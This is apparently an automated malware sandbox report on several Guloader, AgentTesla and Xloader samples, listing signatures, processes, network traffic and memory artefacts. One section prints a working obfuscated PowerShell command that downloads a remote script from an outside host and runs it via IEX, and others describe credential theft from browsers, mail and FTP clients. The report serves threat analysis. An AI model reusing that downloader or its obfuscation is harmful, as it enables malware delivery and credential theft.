Analysis Overview
SHA256
7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca
Threat Level: Known bad
The file 7ca0acdc3e8b24c2034b2205dbfdf744c903cae7c88b1d09b529991168c05dca was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Xloader family
Agenttesla family
Guloader family
AgentTesla
Xloader
Xloader payload
AgentTesla payload
Blocklisted process makes network request
Checks computer location settings
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Loads dropped DLL
Reads user/profile data of local email clients
Reads data files stored by FTP clients
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Hide Artifacts: Ignore Process Interrupts
Unsigned PE
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Gathers system information
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Scheduled Task/Job: Scheduled Task
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 20:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4180 wrote to memory of 3924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4180 wrote to memory of 3924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4180 wrote to memory of 3924 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3924 -ip 3924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
143s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1116 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1116 wrote to memory of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe
"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spa2o.com | udp |
| HR | 185.58.73.32:80 | spa2o.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/1116-0-0x00007FFDF20F3000-0x00007FFDF20F5000-memory.dmp
memory/1116-1-0x00000000005B0000-0x00000000005B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ymwjjgs.h5c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4008-12-0x000002562A340000-0x000002562A362000-memory.dmp
memory/4008-13-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp
memory/4008-14-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp
memory/4008-15-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp
memory/4008-16-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp
memory/4008-19-0x00007FFDF20F0000-0x00007FFDF2BB1000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe
"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync-shop.com | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 225.219.220.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| FR | 23.200.86.235:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 26.58.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.86.200.23.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| FR | 23.200.86.235:80 | r11.o.lencr.org | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
| US | 74.220.219.225:443 | sync-shop.com | tcp |
Files
memory/2588-0-0x0000000002220000-0x0000000002221000-memory.dmp
memory/2588-2-0x0000000000406000-0x0000000000407000-memory.dmp
memory/2588-3-0x0000000000400000-0x00000000004AD000-memory.dmp
memory/2588-4-0x0000000002220000-0x0000000002221000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
61s
Max time network
19s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls
Network
Files
memory/2344-1-0x00000000722CD000-0x00000000722D8000-memory.dmp
memory/2344-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2344-3-0x0000000000320000-0x0000000000420000-memory.dmp
memory/2344-6-0x0000000000320000-0x0000000000420000-memory.dmp
memory/2344-7-0x0000000000320000-0x0000000000420000-memory.dmp
memory/2344-5-0x0000000000320000-0x0000000000420000-memory.dmp
memory/2344-4-0x0000000000320000-0x0000000000420000-memory.dmp
memory/2344-2-0x0000000000320000-0x0000000000420000-memory.dmp
memory/2344-8-0x00000000722CD000-0x00000000722D8000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
130s
Max time network
124s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 268 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
Network
Files
memory/268-0-0x000000007412E000-0x000000007412F000-memory.dmp
memory/268-1-0x0000000000DC0000-0x0000000000E92000-memory.dmp
memory/268-2-0x0000000074120000-0x000000007480E000-memory.dmp
memory/268-3-0x0000000000380000-0x000000000038E000-memory.dmp
memory/268-4-0x000000007412E000-0x000000007412F000-memory.dmp
memory/268-5-0x0000000074120000-0x000000007480E000-memory.dmp
memory/268-6-0x00000000056B0000-0x000000000576C000-memory.dmp
memory/268-7-0x0000000000710000-0x000000000074C000-memory.dmp
memory/2744-8-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2744-12-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2744-20-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2744-18-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2744-14-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2744-13-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2744-16-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2744-11-0x0000000000400000-0x000000000043C000-memory.dmp
memory/268-21-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2744-22-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2744-23-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2744-24-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2744-25-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2744-26-0x0000000074120000-0x000000007480E000-memory.dmp
memory/2744-27-0x0000000074120000-0x000000007480E000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
148s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3792-5-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp
memory/3792-6-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-9-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-17-0x00007FFA76890000-0x00007FFA768A0000-memory.dmp
memory/3792-22-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-21-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-23-0x00007FFA76890000-0x00007FFA768A0000-memory.dmp
memory/3792-20-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-19-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-18-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-16-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-15-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-14-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-13-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-12-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-11-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-10-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-8-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-7-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-4-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp
memory/3792-3-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp
memory/3792-2-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp
memory/3792-1-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp
memory/3792-0-0x00007FFAB8C2D000-0x00007FFAB8C2E000-memory.dmp
memory/3792-47-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-46-0x00007FFAB8C2D000-0x00007FFAB8C2E000-memory.dmp
memory/3792-48-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
memory/3792-49-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 0eb5b1247d963e4d110d0c614b463f6c |
| SHA1 | ba07bcc5e1e4ebdcf361b1311211c21231a3b0c8 |
| SHA256 | d54c96240493dbcaa2ffc9a4586ceac048adce2aee33001f791b6bfa02f46b1a |
| SHA512 | 92b5fc0a6864564acdd6cbdd6c33dfaa92081a8060ccd421491b408345223b9b2e8204d028bda679875e76a5241d4d47cf1a584c75bbb38c30e64d3f13d18fdf |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
147s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 28.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
